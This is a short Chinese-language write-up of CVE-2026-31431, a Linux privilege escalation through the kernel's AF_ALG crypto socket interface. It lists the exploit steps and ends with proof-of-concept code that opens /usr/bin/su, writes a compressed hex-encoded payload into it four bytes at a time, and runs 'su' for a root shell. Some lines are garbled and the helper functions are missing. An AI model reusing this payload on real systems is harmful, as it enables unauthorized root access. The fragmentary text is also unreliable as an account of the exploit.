CVE-2026-31431 是一个 Linux 权限提升漏洞,它滥用了 AF_ALG(内核加密 API) 接口。通过构造与 AEAD(带关联数据的认证加密)套接字的恶意交互,攻击者可以提升权限并以 root 身份执行代码。
该漏洞利用了加密套接字操作处理不当的问题,允许受控的内存操作并最终实现权限提升。
/usr/bin/su)该漏洞利用程序:
创建一个 AF_ALG 套接字
绑定到:
authenc(hmac(sha256),cbc(aes))
通过 setsockopt 和 sendmsg 使用精心构造的载荷
触发意外的内核行为
通过以下方式进入 root shell:
g.system("su")
关键指标:
socket(38,5,0) → AF_ALGzlib)进行受控内存写入
**免责声明:我不拥有此 PoC。它仅用于教育目的,在获得许可的环境中进行测试。作者/所有者不对任何滥用行为负责。 **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")